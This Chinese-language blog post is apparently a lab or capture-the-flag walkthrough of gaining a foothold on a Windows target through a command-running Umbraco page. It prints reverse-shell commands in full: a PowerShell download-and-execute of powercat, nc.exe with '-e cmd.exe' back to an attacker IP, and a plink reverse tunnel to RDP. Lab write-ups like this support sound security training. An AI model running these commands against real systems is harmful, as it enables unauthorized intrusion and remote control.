Windows 連接埠轉發 - Plink

 Windows 連接埠轉發 - Plink


儘管現在的 Windows 已經預設內建 SSH.exe,但實際環境中很多管理者會限制甚至移除

這時候尋求 PUTTY.exe 或是 PLINK 是另外一種好用的工具

環境說明,目標 Windows 對外僅有開放 Web Service 80 Port




第一步,透過 Web Service 入侵建立 Interactive Shell

攻擊機 192.168.45.160

靶機 192.168.201.64

rustscan 後,靶機對外僅有 80 Port





gobuster 看看入侵點吧

└─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/ -t 150 -x .aspx

結果跳 Error : http://192.168.201.64/f606e083-b7c0-4b32-9a46-bcd18b686e9d => 200 (Length: 1917). To continue please exclude the status code or the length




那就 ignore 該 length 繼續,└─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/ -t 150 -x .aspx --exclude-length 1917

沒掃到可利用的




網站有個子路徑 /umbraco





gobuster 加上子路徑再掃看看

└─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/umbraco -t 150 -x .aspx                       




掃完發現有個可以直接利用的 forms.aspx,可以直接下 command






之前有學過可以直接利用 powercat.ps1,powercat.ps1 查找與複製到 HTTP Server 根目錄




指令如下 powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/powercat.ps1');powercat -c 192.168.45.160 -p 4444 -e powershell"

remote shell 進來了,ipconfig 確認無誤接著 whoami 看一下是 IIS 的權限






另外也可以利用 nc.exe,kali 本機就有內建 nc.exe 可供使用

不知道在哪可以直接查找 find / -name nc.exe 2>/dev/null

nc.exe 位於 /usr/share/windows-resources/binaries/nc.exe




將 nc.exe COPY 到 kali home 目錄然後起 HTTP Server 等等下載 nc.exe payload 用

└─$ cp /usr/share/windows-resources/binaries/nc.exe .



接著用 powershell 接 wget 指令將 nc.exe 下載到 Windows 主機

指令 powershell wget -Uri http://192.168.45.160/nc.exe -OutFile C:\Windows\Temp\nc.exe




然後直接執行 nc.exe 連到攻擊機的 4444 Port

指令 : C:\Windows\Temp\nc.exe -e cmd.exe 192.168.45.160 4444

Remote Shell 進來了,一樣 whoami & ipconfig 看一下





測試了一下發現這一台 Windows 還真的沒有安裝(或是移除了) SSH.exe






那就改用好用的工具 plink.exe,kali 一樣有內建,一樣將檔案 COPY 到 Web Server 根目錄

└─$ find / -name plink.exe 2>/dev/null

路徑在 /usr/share/windows-resources/binaries/plink.exe
└─$ cp /usr/share/windows-resources/binaries/plink.exe .                                      





一樣下載到 C:\Windows\Temp\~ 底下

指令 : powershell wget -Uri http://192.168.45.160/plink.exe -OutFile C:\Windows\Temp\plink.exe





plink 指令與 OPENSSH 類似

指令 : cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw "kali" -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.160

結果說 FATAL ERRORC:\windows\Temp>: Network error: Connection refused




看來是現在的 SSH 不是用高權限起的,所以輸入 └─$ sudo systemctl start ssh




再測試一次指令 :  cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw "kali" -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.160,結果成功了


 



kali 的 9833 Port 起來了





通過 SSH Tunnel 對應到 Windows 機器的 3389 Port,如下圖





所以直接 xfreerdp kali 自己的 9833 Port,就可以開啟 Windows 的遠端桌面了

用之前拿到的帳號密碼,指令 xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833

可以看到 RDP 開起來了,顯示是 127.0.0.1:9833






直接拿桌面的 flag 吧





留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)